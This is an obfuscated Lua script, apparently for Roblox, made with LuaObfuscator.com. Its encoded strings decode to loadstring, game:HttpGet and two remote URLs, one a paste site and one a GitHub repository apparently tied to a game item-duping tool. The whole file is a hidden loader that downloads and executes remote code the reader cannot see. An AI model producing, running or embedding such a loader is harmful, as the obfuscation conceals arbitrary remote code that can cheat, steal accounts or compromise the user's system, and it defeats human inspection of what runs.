--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v89=v2(v0(v30,16));if v19 then local v111=v5(v89,v19);v19=nil;return v111;else return v89;end end end);local function v20(v31,v32,v33) if v33 then local v90=(v31/((570 -(367 + 201))^(v32-(2 -1))))%(2^(((v33-1) -(v32-(2 -(1066 -(68 + 997))))) + ((1271 -(226 + 1044)) -0))) ;return v90-(v90%(2 -(4 -3))) ;else local v91=((738 -(32 + 85)) -(555 + 64))^(v32-(1638 -(1523 + 114))) ;return (((v31%(v91 + v91))>=v91) and ((914 + 18) -(191 + 666 + 74))) or (0 -0) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + 2 );v18=v18 + (959 -(892 + 65)) ;return (v36 * (610 -354)) + v35 ;end local function v23() local v37=0 -0 ;local v38;local v39;local v40;local v41;while true do if (v37==(0 + 0)) then v38,v39,v40,v41=v1(v16,v18,v18 + (4 -1) );v18=v18 + (354 -(87 + 263)) ;v37=181 -(67 + 113) ;end if (v37==1) then return (v41 * (12302277 + 4474939)) + (v40 * (160901 -(379026 -283661))) + (v39 * 256) + v38 ;end end end local function v24() local v42=952 -(802 + (1288 -(116 + 1022))) ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(7 -4)) then if (v47==0) then if (v46==(0 -0)) then return v48 * (0 + 0) ;else local v119=997 -(915 + 82) ;while true do if (v119==((0 -0) -0)) then v47=1 + 0 ;v45=0;break;end end end elseif (v47==(2691 -644)) then return ((v46==0) and (v48 * (((698 + 490) -(1069 + 118))/(0 -0)))) or (v48 * NaN) ;end return v8(v48,v47-((738 + 1582) -1297) ) * (v45 + (v46/((3 -1)^((35 -25) + 42)))) ;end if (v42==1) then v45=1 -0 ;v46=(v20(v44,1 + 0 ,(1670 -(814 + 45)) -(368 + 423) ) * ((6 -4)^((41 + 9) -(10 + (19 -11))))) + v43 ;v42=7 -5 ;end if (v42==(444 -(416 + 2 + 24))) then v47=v20(v44,66 -45 ,31);v48=((v20(v44,32)==(1 + 0)) and  -(1 -0)) or (439 -(52 + 93 + (1065 -(201 + 571)))) ;v42=433 -(44 + 386) ;end if (v42==(1486 -(998 + 488))) then v43=v23();v44=v23();v42=1;end end end local function v25(v49) local v50;if  not v49 then v49=v23();if (v49==0) then return "";end end v50=v3(v16,v18,(v18 + v49) -(886 -(261 + 624)) );v18=v18 + v49 ;local v51={};for v67=1 -0 , #v50 do v51[v67]=v2(v1(v3(v50,v67,v67)));end return v6(v51);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return function(v92,v93,v94,v95,v96,v97,v98,v99,v100) local v101=(function() return 574 -(507 + 67) ;end)();local v92=(function() return;end)();local v93=(function() return;end)();while true do local v110=(function() return 1749 -(1013 + 736) ;end)();while true do if (v110~=(0 + 0)) then else if ((2 -1)==v101) then local v120=(function() return 0;end)();while true do if (v120==0) then while true do if (v92==(0 -0)) then v93=(function() return v94();end)();if (v95(v93, #"!", #">")==0) then local v187=(function() return 0;end)();local v188=(function() return;end)();local v189=(function() return;end)();local v190=(function() return;end)();while true do if (v187==2) then if (v95(v189, #"\\", #"{")~= #"]") then else v190[869 -(550 + 317) ]=(function() return v98[v190[2 -0 ]];end)();end if (v95(v189,2,2 -0 )== #",") then v190[ #"xnx"]=(function() return v98[v190[ #"nil"]];end)();end v187=(function() return 3;end)();end if (v187==(2 -1)) then local v191=(function() return 0;end)();while true do if (v191~=1) then else v187=(function() return 287 -(134 + 151) ;end)();break;end if ((1665 -(970 + 695))==v191) then v190=(function() return {v96(),v96(),nil,nil};end)();if (v188==0) then local v196=(function() return 0 -0 ;end)();local v197=(function() return;end)();while true do if (v196==(0 -0)) then v197=(function() return 1467 -(899 + 568) ;end)();while true do if (v197==0) then v190[ #"19("]=(function() return v96();end)();v190[ #"?id="]=(function() return v96();end)();break;end end break;end end elseif (v188== #">") then v190[ #"-19"]=(function() return v97();end)();elseif (v188==(1992 -(582 + 1408))) then v190[ #"19("]=(function() return v97() -(2^16) ;end)();elseif (v188== #"19(") then local v202=(function() return 0 -0 ;end)();local v203=(function() return;end)();while true do if (v202==(0 -0)) then v203=(function() return 0 -0 ;end)();while true do if ((0 -0)==v203) then v190[ #"-19"]=(function() return v97() -((605 -(268 + 335))^(306 -(60 + 230))) ;end)();v190[ #"?id="]=(function() return v96();end)();break;end end break;end end end v191=(function() return 1825 -(1195 + 629) ;end)();end end end if (v187~=(572 -(426 + 146))) then else v188=(function() return v95(v93,1 + 1 , #"-19");end)();v189=(function() return v95(v93, #".dev",1462 -(282 + 1174) );end)();v187=(function() return 812 -(569 + 242) ;end)();end if (v187==(3 -0)) then if (v95(v189, #"19(", #"xxx")== #"!") then v190[ #"0313"]=(function() return v98[v190[ #"0313"]];end)();end v99[v100]=(function() return v190;end)();break;end end end break;end end return v92,v93,v94,v95,v96,v97,v98,v99,v100;end end end if (v101==(241 -(187 + 54))) then local v121=(function() return 780 -(162 + 618) ;end)();while true do if (v121~=(0 + 0)) then else v92=(function() return 0 + 0 ;end)();v93=(function() return nil;end)();v121=(function() return 1 + 0 ;end)();end if (v121==1) then v101=(function() return 1 -0 ;end)();break;end end end break;end end end end;end)();local v53=(function() return function(v102,v103,v104) local v105=(function() return 0 -0 ;end)();local v106=(function() return;end)();while true do if (v105~=(1251 -(721 + 530))) then else v106=(function() return 0;end)();while true do if (v106~=(1271 -(945 + 326))) then else v102[v103-#":" ]=(function() return v104();end)();return v102,v103,v104;end end break;end end end;end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {v54,v55,nil,v56};end)();local v58=(function() return v23();end)();local v59=(function() return {};end)();for v69= #"\\",v58 do local v70=(function() return 1636 -(1373 + 263) ;end)();local v71=(function() return;end)();local v72=(function() return;end)();while true do if (v70==(1001 -(451 + 549))) then if (v71== #"|") then v72=(function() return v21()~=0 ;end)();elseif (v71==(702 -(271 + 429))) then v72=(function() return v24();end)();elseif (v71~= #"91(") then else v72=(function() return v25();end)();end v59[v69]=(function() return v72;end)();break;end if (v70==0) then local v113=(function() return 0;end)();local v114=(function() return;end)();while true do if (v113~=(0 + 0)) then else v114=(function() return 0 + 0 ;end)();while true do if (v114~=0) then else local v133=(function() return 0 -0 ;end)();while true do if ((0 -0)~=v133) then else v71=(function() return v21();end)();v72=(function() return nil;end)();v133=(function() return 1385 -(746 + 638) ;end)();end if (v133==(1 + 0)) then v114=(function() return 1;end)();break;end end end if (v114==(1087 -(461 + 625))) then v70=(function() return 1;end)();break;end end break;end end end end end v57[ #"xnx"]=(function() return v21();end)();for v73= #" ",v23() do FlatIdent_C460,Descriptor,v21,v20,v22,v23,v59,v54,v73=(function() return v52(FlatIdent_C460,Descriptor,v21,v20,v22,v23,v59,v54,v73);end)();end for v74= #"]",v23() do v55,v74,v28=(function() return v53(v55,v74,v28);end)();end return v57;end local function v29(v61,v62,v63) local v64=v61[1289 -(993 + 295) ];local v65=v61[1 + 1 ];local v66=v61[(2304 -(369 + 761)) -(242 + 176 + 753) ];return function(...) local v75=v64;local v76=v65;local v77=v66;local v78=v27;local v79=1;local v80= -(1 + 0);local v81={};local v82={...};local v83=v12("#",...) -(1 + (0 -0)) ;local v84={};local v85={};for v107=0,v83 do if ((v107>=v77) or (3417<2534)) then v81[v107-v77 ]=v82[v107 + 1 + 0 ];else v85[v107]=v82[v107 + (530 -(406 + 123)) ];end end local v86=(v83-v77) + ((3354 -1584) -(1749 + 20)) ;local v87;local v88;while true do v87=v75[v79];v88=v87[1 + 0 ];if (v88<=5) then if ((v88<=(1324 -(1249 + (311 -(64 + 174))))) or (788>2514)) then if ((v88<=(0 + 0)) or (2722<=164)) then for v128=v87[1147 -(466 + 679) ],v87[6 -3 ] do v85[v128]=nil;end elseif ((v88>(2 -1)) or (2408<2109)) then v85[v87[1902 -(106 + 1794) ]]=v87[3];else v85[v87[1 + 1 ]]=v87[3]~=(0 + 0 + 0) ;end elseif (v88<=(8 -5)) then if (v85[v87[5 -3 ]]==v87[118 -((5 -1) + 110) ]) then v79=v79 + (585 -(57 + 527)) ;else v79=v87[1430 -(41 + 1386) ];end elseif (v88>(107 -((353 -(144 + 192)) + 86))) then local v138=v87[2 + (216 -(42 + 174)) ];v85[v138]=v85[v138](v13(v85,v138 + (1 -0) ,v80));else v85[v87[2]]=v63[v87[(7 + 1) -5 ]];end elseif (v88<=(174 -(122 + 44))) then if ((v88<=6) or (55==2387) or (33==1455)) then v79=v87[5 -2 ];elseif ((v88==(22 -15)) or (443>=4015)) then v85[v87[2]]();else local v142=0 + 0 ;local v143;local v144;while true do if ((1454<2491) and ((1 + 0)==v142)) then v85[v143 + (1 -0) ]=v144;v85[v143]=v144[v87[4]];break;end if (v142==(65 -(30 + 29 + 6))) then v143=v87[2 + 0 ];v144=v85[v87[1260 -(1043 + 214) ]];v142=(2 + 1) -2 ;end end end elseif (v88<=(1221 -(323 + 889))) then local v124=v87[5 -3 ];local v125,v126=v78(v85[v124](v13(v85,v124 + 1 ,v87[3])));v80=(v126 + v124) -(581 -(361 + 219)) ;local v127=320 -((1557 -(363 + 1141)) + (1847 -(1183 + 397))) ;for v130=v124,v80 do v127=v127 + 1 ;v85[v130]=v125[v127];end elseif ((v88>(3 + 7)) or (4157<=2803)) then do return;end else local v145=0;local v146;local v147;local v148;local v149;local v150;while true do if (v145==(419 -(15 + 398))) then v85[v87[984 -(18 + 964) ]]();v79=v79 + ((8 -5) -2) ;v87=v75[v79];v85[v87[2 + 0 ]]=v63[v87[2 + 1 ]];v79=v79 + (851 -(20 + 609 + 221)) ;v145=6 + 1 + 0 ;end if (v145==(129 -(116 + 10))) then v87=v75[v79];v85[v87[1 + 1 ]]=v87[741 -((2517 -(1913 + 62)) + 196) ]~=(0 -0) ;v79=v79 + 1 + 0 + 0 ;v87=v75[v79];v150=v87[2];v145=3 + 1 ;end if (v145==(2 + 2)) then v147,v148=v78(v85[v150](v13(v85,v150 + (2 -1) ,v87[7 -4 ])));v80=(v148 + v150) -(1552 -(1126 + 425)) ;v146=405 -(118 + (759 -472)) ;for v184=v150,v80 do v146=v146 + (3 -2) ;v85[v184]=v147[v146];end v79=v79 + (1934 -(565 + 1368)) ;v145=1126 -(118 + 1003) ;end if ((3382>166) and (v145==(2 -1))) then v79=v79 + (378 -(142 + 235)) ;v87=v75[v79];v150=v87[2];v149=v85[v87[13 -10 ]];v85[v150 + 1 + 0 ]=v149;v145=979 -(553 + (1594 -1170)) ;end if (((4853>=2982) and (v145==(9 -4))) or (280==3059)) then v87=v75[v79];v150=v87[2 + 0 ];v85[v150]=v85[v150](v13(v85,v150 + 1 + 0 ,v80));v79=v79 + 1 + 0 ;v87=v75[v79];v145=6;end if ((4134>3357) and (v145==(4 + 4))) then v149=v85[v87[(1663 -(1477 + 184)) + 1 ]];v85[v150 + (2 -1) ]=v149;v85[v150]=v149[v87[11 -(9 -2) ]];break;end if (v145==(15 -8)) then v87=v75[v79];v85[v87[1 + 1 ]]=v63[v87[14 -11 ]];v79=v79 + (754 -(223 + 16 + 514)) ;v87=v75[v79];v150=v87[1 + 1 ];v145=8;end if ((1881>1293) and (v145==0)) then v146=nil;v147,v148=nil;v149=nil;v150=nil;v85[v87[1331 -(797 + 532) ]]=v63[v87[3]];v145=1 + 0 ;end if (v145==2) then v85[v150]=v149[v87[2 + 2 ]];v79=v79 + (2 -1) ;v87=v75[v79];v85[v87[2]]=v87[1205 -(373 + 829) ];v79=v79 + 1 ;v145=3;end end end v79=v79 + ((1588 -(564 + 292)) -(476 + 255)) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!063Q00028Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403283Q00682Q7470733A2Q2F63646E2E736F75726365622E696E2F62696E732F5751365A324F702Q33312F3003513Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F47726F7744757065722F72616E646F6D697A65722F726566732F68656164732F6D61696E2F62656E67726F77706574001B3Q0012023Q00016Q000100013Q0026033Q0002000100010004063Q00020001001202000100013Q00260300010005000100010004063Q00050001001204000200023Q00120A000300033Q00202Q00030003000400122Q000500056Q000600016Q000300066Q00023Q00024Q00020001000100122Q000200023Q00122Q000300033Q00202Q000300030004001202000500064Q0009000300054Q000500023Q00022Q00070002000100010004063Q001A00010004063Q000500010004063Q001A00010004063Q000200012Q000B3Q00017Q00",v9(),...);
